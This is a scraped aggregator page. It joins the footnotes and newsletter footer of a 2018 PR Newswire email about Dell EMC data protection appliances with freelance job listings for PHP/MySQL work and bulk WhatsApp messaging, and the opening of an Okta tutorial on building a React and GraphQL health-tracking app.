    <li><a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasXGnr5sNyw2Y7M-2BNc6FNPHJG8dhg9gDl4AZxKZg63605_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJN8EeR5D4etPt5vpgPrriiVKWKRVXYs20Ksvg4RIo0VqMEdIDNVBJD5sgEG-2BIlyobfOkJuilaBZlUhhEBfqxkXJ6itmTLsFLqRBYWRDz1dcyOKLT5TNj88-2BQ5A3GG-2FfQBFiSYoZHrcNSeYnkegu1Scg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Dell EMC Integrated Data Protection</a> Appliance webpage </li>
    <li>Connect with Dell EMC via <a href="http://email.prnewswire.com/wf/click?upn=qeFhW7A7ACl3lrgk3Z9QlW89lAXpozEAnnvBWjMnFfc-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJByEd7jVMWlLETuhvBm9-2FvEX3UBk-2Bn7wqcBazGOk1XPHavR0I5kUgph2n203EhW44rozV65VBDdpajLQaIbxRbsdftIPzw7O9EhheUoophWu8zZNl0okRSZpPCfc-2FDhn5ULc6g532PdG9V00EWImItQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Twitter</a>,&nbsp;<a href="http://email.prnewswire.com/wf/click?upn=qeFhW7A7ACl3lrgk3Z9QlXNGU-2Bbl4jnoGnIrORMNZoQ-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJMMBpSjWLWAkHrPlAcmJqHLffAoYeC3qWQ-2FGbxnCCzrYIw65TUUCyFILCGGpirzuEWYZwwpM2y0O5tEE0uxBe3FeKbuJGCusksIrCI2FpvOKlNI0vBH6exptTb8YfXeXS7Swnm8rrx1nLzmq24L639Q-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Facebook</a>, <a href="http://email.prnewswire.com/wf/click?upn=qeFhW7A7ACl3lrgk3Z9QlWR2MJk58wtWvWr3U-2BGDwhU-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJ4-2F1VeEkG1cuMMIhdDPbks-2B-2BI5qwZP0R-2BGFtmCxoU9YU99sbsF85HZjS72boVhB-2FrW8HOIE5UU1OCpQgxgRcl3ss0Yy8PJ7ZVdXqAk3xoaj-2FkwTvlmdmwDgxtQfRWuMl40Ustlb7XgrFoMy7L304TWA-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">YouTube</a>, <a href="http://email.prnewswire.com/wf/click?upn=qeFhW7A7ACl3lrgk3Z9QlXZCEX8Q5lqI1vtYzJYjVeo-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJxcZo2UJ9GQejXn89FxzINiv5IZZYvHGz-2FR0-2BTmKDZCBWEEYCaEY-2FXC2doSJKJEHKOc0gxQpYLJn-2FWmNI8a675ij0TcqZYJsEqObZ11PAObMCcri0imiyfQDWmMVNokPIjcb8FFqNFm9sQnm1rhL91Q-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">LinkedIn</a> and <a href="http://email.prnewswire.com/wf/click?upn=qeFhW7A7ACl3lrgk3Z9QlRhwFVLqMcVC4TgJkvE7e8M-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJeUJzjFYWZr5Pc-2BZ9DUIrro-2FINh3g7VkhwOJnmmrjHqPf6Jg2TilnUHYZQxaWH10-2BRZsbuqmd-2B1jAACsp-2BkcNO4gdlFWgFg-2ByxZAHv9eAHh3H2k0naJ0KQPxGrYU1inP-2B-2Bz4XaiBneDCOmOI7jtbQkQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">ECN</a>. </li>
   </ul>
   <p><b>About Dell EMC</b></p>
   <p><a href="http://email.prnewswire.com/wf/click?upn=TwIh0OIjG8BOSB67uKqqj-2BMe42lkBK5XIq5pHL0AJs0-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJkCZXwHqz20I43w1ZhT55okQtl7hcSKOUnV56BLcOuV-2FIriPkW8xDSmYDNOKmPgjmTJoIVwXe8Nhhy7pKWrEwQSe6hGUlp3fA0X0bxlcdS88tfqRXCJqxTt0dS0A8zfJ16cCizZmv5rDb0gFA5sfAkQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Dell EMC</a>, a part of <a href="http://email.prnewswire.com/wf/click?upn=TwIh0OIjG8BOSB67uKqqj3zYmODsrSKt7lhhdu4PbCwp9e5toPViMbQ59rj6Um3g_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJdgX8LDEDH3gY85qnCXYbGVHk31mTegwYndBlsoH5wtFSKBp9NJcpuRrKsvQ3-2BEiRqsW5eAn6vvo0TB75ZaAW0zzWmcQvRgFiO1zw5fPRBvIYOR-2FT792aWRCdx5ZlFocNfzJjUigjFklS7Dm9S8filg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Dell Technologies</a>, enables organizations to modernize, automate and transform their data center using industry-leading converged infrastructure, servers, storage and data protection technologies. &nbsp;This provides a trusted foundation for businesses to transform IT, through the creation of a hybrid cloud, and transform their business through the creation of cloud-native applications and big data solutions. &nbsp;Dell EMC services customers across 180 countries – including 98 percent of the Fortune 500 – with the industry's most comprehensive and innovative portfolio from edge to core to cloud.</p>
   <p>Copyright © 2018 Dell Inc. or its subsidiaries. All Rights Reserved. Dell, EMC and other trademarks are trademarks of Dell Inc. or its subsidiaries.&nbsp;Other trademarks may be trademarks of their respective owners.&nbsp;</p>
   <br>
   <p><sup>i</sup> Dell EMC internal analysis using publically available competitive pricing from Rubrik and Cohesity, <span class="xn-chron">May 2018</span>. Lowest cost to protect is based on $ per logical GB. Actual cost will vary.</p>
   <p><sup>ii</sup> Based on Dell EMC internal analysis of customer data as of <span class="xn-chron">May 2018</span>.</p>
   <p><sup>iii</sup> Based on internal analysis, <span class="xn-chron">June 2018</span>.</p>
   <p><sup>iv</sup> Source: ESG Lab Review commissioned by Dell EMC, <span class="xn-chron">February 2018</span>, versus a competitive Vendor A. <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasYG0Ye7xrHOyihUB9gbMhJCE24p2AJ3BLxNmEC-2FrahhjezbkLXu-2Bjtw-2F-2FJ4oblqn-2BEhB3Losohw9xazgWu8rTUX-2BD0fYV81zasTkRgEfegG3gaApM2c0SG7qat-2BNYCoQj68TPr0LXJW5uTseWuD9Vq-2Fe6p-2FndL57J2hYw8V4k4bE_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJLPNvc37iPsi-2BgMHQwzpYGnFji0cu33SnjCvhop1qzV7eicbyNuHnOy1ZzOv1iMVcF-2Fqf-2BE-2BG7GP6zgXkmxERZTOwT-2FZRQElQCD-2FOGfnSjUuT-2Bo8PrYqQW7DmYjijwvVoA-2BCmWMitMrYXDLD-2FbcZETg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Additional information</a> on the testing environment.</p>
   <p><sup>v</sup> Source: Based on Dell EMC internal testing</p>
   <p><sup>vi</sup> Free option when selected at the time of purchase.</p>
   <p><sup>vii</sup> Source: Based on Dell EMC internal testing and comparing against Rubrik's published performance data in 2U, <span class="xn-chron">February 2018</span></p>
   <p><sup>viii</sup> Source: Dell EMC internal analysis using publically available competitive pricing from Rubrik and Cohesity, <span class="xn-chron">May 2018</span>. Based on $ per logical GB. Actual cost will vary.</p>
   <p><sup>ix</sup> Source: ESG Lab Review commissioned by Dell EMC, <span class="xn-chron">February 2018</span>, versus a competitive Vendor A. <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasYG0Ye7xrHOyihUB9gbMhJCE24p2AJ3BLxNmEC-2FrahhjezbkLXu-2Bjtw-2F-2FJ4oblqn-2BEhB3Losohw9xazgWu8rTUX-2BD0fYV81zasTkRgEfegG3gaApM2c0SG7qat-2BNYCoQj68TPr0LXJW5uTseWuD9Vq-2Fe6p-2FndL57J2hYw8V4k4bE_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJ2-2F3sRCpOwel-2BoBCaBfXSPFJx9HT1lzf3Rfu44ZfOA1g-2BLsr17ajsqhmUSYRqdQKfvBmh3zOMN8-2F14lgAMubUSirT8yg4-2F5vrIyRppA9IaCpNEf1DAbW8C07Y1gFTZxwZzx-2Ff6wsvVD-2FGh4yh2U4HAQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Additional information</a> on the testing environment.</p>
   <p><sup>x</sup> Based on Dell EMC internal analysis, <span class="xn-chron">May 2018</span>, using Rubrik's published data. Actual results will vary.</p>
   <p><sup>xi</sup> Dell EMC internal analysis using publically available competitive pricing from Rubrik and Cohesity, <span class="xn-chron">May 2018</span>. Lowest cost-to-protect is based on $ per logical GB. Actual cost will vary.</p>
   <p><sup>xii</sup> Satisfaction Guarantee: Requires purchase of a 3-year ProSupport agreement. Compliance is based on product specifications. Any refund will be prorated.</p>
   <p><sup>xiii</sup> Hardware Investment Protection: Trade-In value determined based on market conditions at Dell EMC's sole discretion.</p>
   <p><sup>xiv</sup> <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasTuH1RMGejGvx0SwTBzkhGWMUFRa0yjQDoGEv6y8t3jl_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJSdHxLgftcS7ExYvLxqoi1nxLWG6bhiVFTGlik8n0QdLmN0t-2F-2BQje78k-2F7-2FuB7Jo-2BQAXpYaLUF9kQd55jJN5LTTP3E3wTr0MkDrRMlaNbPAMJWywMIi-2FTJkDe76sjVF62m-2FSeffRyCtsBcA6QnkwyaQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Up to 55:1 Data Protection Deduplication Guarantee</a> guarantees effective logical data protection storage capacity of up to 55x the purchased physical capacity. Individual results may vary.</p> 
   
   <p>SOURCE Dell EMC</p>CONTACT: Kevin Kempskie for Dell EMC, 508.293.7642, kevin.kempskie@dell.com<table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="8px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:8px;font-weight:400;hyphens:auto;line-height:8px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table> <table class="button medium expand" style="Margin:0 0 16px 0;border-collapse:collapse;border-spacing:0;margin:0 0 16px 0;padding:0;text-align:left;vertical-align:top;width:100%!important"><tr style="padding:0;text-align:left;vertical-align:top"><td style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:1.3;margin:0;padding:0;text-align:left;vertical-align:top;word-wrap:break-word"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><td style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;background:#00607F;border:2px solid #00607F;border-collapse:collapse!important;color:#fefefe;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:1.3;margin:0;padding:0;text-align:left;vertical-align:top;word-wrap:break-word"><center data-parsed="" style="min-width:0;width:100%"><a href='http://email.prnewswire.com/wf/click?upn=z3qiKnBCpunqdJkRppsiEbSmnibeutBGHu9PCpp0b6U4Q4ZotzjXnIzJXOhYxAYUczEhwuacI3iWNG9gOgfP2M0yiGDzENztys997S-2BsSuA-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJ-2B4ruCQn91tHn4sALMeINsP-2BJcXI0VTIO2LcgnQF0KBLaktyEqTgwYeDnSuirE2aVDyzVQrzuToyZW7aR3tYXJXJxLKDyGcKPx-2BtD5zo-2FjsRXf4RPi53JNesynbE1Wp2eZZXtPjHQEAt8ThnWlAwjCg-3D-3D'align="center" class="float-center" style="Margin:0;border:0 solid #00607F;border-radius:5px;color:#fefefe;display:inline-block;font-family:Montserrat,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.3;margin:0;padding:8px 16px 8px 16px;padding-left:0;padding-right:0;text-align:center;text-decoration:none;text-transform:uppercase;width:100%">View in Browser</a></center></td></tr></table></td><td class="expander" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:1.3;margin:0;padding:0!important;text-align:left;vertical-align:top;visibility:hidden;width:0;word-wrap:break-word"></td></tr></table> </th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th></tr></tbody></table><table class="row sub-footer" style="background:#e5f2f3;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left"><table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table> <h4 class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:500;line-height:1.3;margin:0;margin-bottom:10px;padding:0;text-align:center;word-wrap:normal">Tech</h4><h5 class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:14px;font-weight:400;line-height:1.3;margin:0;margin-bottom:10px;padding:0;text-align:center;word-wrap:normal"><strong>Username:</strong> aronschatz | <a href="http://email.prnewswire.com/wf/click?upn=z3qiKnBCpunqdJkRppsiEbSmnibeutBGHu9PCpp0b6W-2FoNI0ROearmohKp42569WC64-2FSpdy8Fo3nCX4s3fhCFq-2FttXRiT9oD9muRlENXOn7XeMspKjmOZLHDgA1mW9Y_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJSGepdHF9yNVrp3y93MOQBmdq8Rcj-2BQa6WfrJjRmF3GhAwLedQcZZlzu14ypdOIkV7xj7TwSVtHmttVY6eWHIZXMNXOQzZ4gtZarC6ZTCwhVG6KylfvgoT4Tqk47bqh25Sv0C2-2BbIeZJRhdmasfGpMg-3D-3D" style="Margin:0;color:#00607F;font-family:Montserrat,Arial,sans-serif;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left;text-decoration:none">edit profile</a></h5></th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th></tr></tbody></table>              <table class="row footer" style="background:#f6f6f6;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top">                <th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left">                  <table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    <strong style="font-weight:250!important">                      Copyright &copy; PR Newswire Association LLC. All Rights Reserved.                    </strong>                  </p>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    <strong style="font-weight:250!important">                      A Cision company.                    </strong>                  </p>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    350 Hudson Street, Suite 300 New York, NY 10014-4504                  </p>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    <a href="http://email.prnewswire.com/wf/click?upn=TwIh0OIjG8BOSB67uKqqj527Ndmd47su-2BVNkeMqZLyk-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJaRW2bjkeErLe8VrNXGzl1ofiuka73khZSwPfKpLDkgWW4SohTOh26nhcYEX9TRVGmv13eEp9EIleCikLSbQNVIrVZE2B0iJYHb0vWQ2kuw3i2jI-2B6jv2yU-2FuqWIzfsSlCE42U3DU8M8ei034Iaxqsw-3D-3D" style="Margin:0;color:#00607F;font-family:Montserrat,Arial,sans-serif;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left;text-decoration:none">http://www.prnewswire.com</a>                  </p>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    To change the settings for your profile(s), email delivery or unsubscribe go to<br>                    <a href="http://email.prnewswire.com/wf/click?upn=z3qiKnBCpunqdJkRppsiEbSmnibeutBGHu9PCpp0b6W-2FoNI0ROearmohKp42569WxPxLmCJLONMn1VSHyUOtdRl0LgkDpR33F0lynsy9e3o-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJAGACvWwaHG65dt-2F2nVmEUia3xtCpd1NlkAmBIYKJ2a2XVyubO6ngpIJIU1To5ZcgnqaWrDEwrNkK-2BfxyxrcjhJWJZnrHupZtc4iiFSXpZiIh70j1uTzNAxgmj-2FMu-2FcsZJAN0Chbhbs1NiWIlGJhjQw-3D-3D" style="Margin:0;color:#00607F;font-family:Montserrat,Arial,sans-serif;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left;text-decoration:none">https://prnmedia.prnewswire.com/profile/?action=editProfile</a><br>and select the profile you would like to edit or delete. You can select the industries, subjects, languages, geographical areas, companies, delivery options and delivery frequencies of your choice.                  </p>                  <p class="text-center" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:10px;font-weight:400;line-height:16px;margin:0;margin-bottom:10px;padding:0;text-align:center">                    In addition to current press releases, you can also find archived news, corporate information, photos, tradeshow news and much more on the PR Newswire for Journalists website:<br><a href="http://email.prnewswire.com/wf/click?upn=z3qiKnBCpunqdJkRppsiEbSmnibeutBGHu9PCpp0b6WyN-2FuRoFWC-2BvU2X16iF3dB_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJG2MkartJ1WJe-2FtCXZHZvuzTDQDNnNbRQUzWCVfjsj59w4EaXDNHg74gV7v2tQaQverxxjYJxIl-2ByXQay6YQuC30HnW7cYfQbXkMuMy9vVqbfGddvnIklgOXTZ7GlSKl0G1Dx6M9kGxy0FunDBh8DPQ-3D-3D" style="Margin:0;color:#00607F;font-family:Montserrat,Arial,sans-serif;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left;text-decoration:none">https://prnmedia.prnewswire.com</a>                  <br>    &nb
          Optimizing my php code.      Cache   Translate Page   Web Page Cache   
I am looking for a very experienced database and query developer. I have a currently a query that is too heavy and need an optimization ( maybe rewrite ) I am looking for someone that can handle stored... (Budget: $10 - $30 USD, Jobs: MySQL, PHP)
          Sending bulk Whatsapp messages via API - marketing      Cache   Translate Page   Web Page Cache   
need to develop script to enable us to send bulk Whatsapp messages using an API such as php need to be able to upload a text file with phone numbers and insert a message that gets sent to all number in text file Automatically... (Budget: $30 - $250 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
          Build a Health Tracking App with React, GraphQL, and User Authentication      Cache   Translate Page   Web Page Cache   

I think you’ll like the story I’m about to tell you. I’m going to show you how to build a GraphQL API with Vesper framework, TypeORM, and MySQL. These are Node frameworks, and I’ll use TypeScript for the language. For the client, I’ll use React, reactstrap, and Apollo Client to talk to the API. Once you have this environment working, and you add secure user authentication, I believe you’ll love the experience!

Why focus on secure authentication? Well, aside from the fact that I work for Okta, I think we can all agree that pretty much every application depends upon a secure identity management system. For most developers who are building React apps, there’s a decision to be made between rolling your own authentication/authorization or plugging in a service like Okta. Before I dive into building a React app, I want to tell you a bit about Okta, and why I think it’s an excellent solution for all JavaScript developers.

What is Okta?

